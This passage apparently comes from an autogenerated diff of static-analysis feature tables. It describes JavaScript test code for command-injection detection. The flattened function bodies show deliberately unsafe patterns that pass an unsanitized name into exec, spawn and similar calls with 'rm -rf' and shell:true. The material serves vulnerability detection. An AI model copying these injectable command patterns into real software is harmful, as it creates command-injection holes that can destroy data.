-rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:45 | name + ':' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:45 | name + ':' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:43:428:45 | ':' | stringConcatenatedWith | name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:49:428:50 | '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:49:428:50 | '' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:49:428:50 | '' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:49:428:50 | '' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:49:428:50 | '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:55:428:57 | '-' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:61:428:69 | SPAWN_OPT | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:431:0 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:431:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:431:0 | this | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:431:0 | this | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:431:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | 'arguments' object of function build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | 'arguments' object of function build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | 'arguments' object of function build | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | 'arguments' object of function build | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | 'arguments' object of function build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | exceptional return of function build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | exceptional return of function build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | exceptional return of function build | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | exceptional return of function build | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | exceptional return of function build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | functio ... arr;\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | functio ... arr;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | functio ... arr;\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | return of function build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | return of function build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | return of function build | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | return of function build | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:1:438:1 | return of function build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:10:431:14 | build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:16:431:20 | first | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| 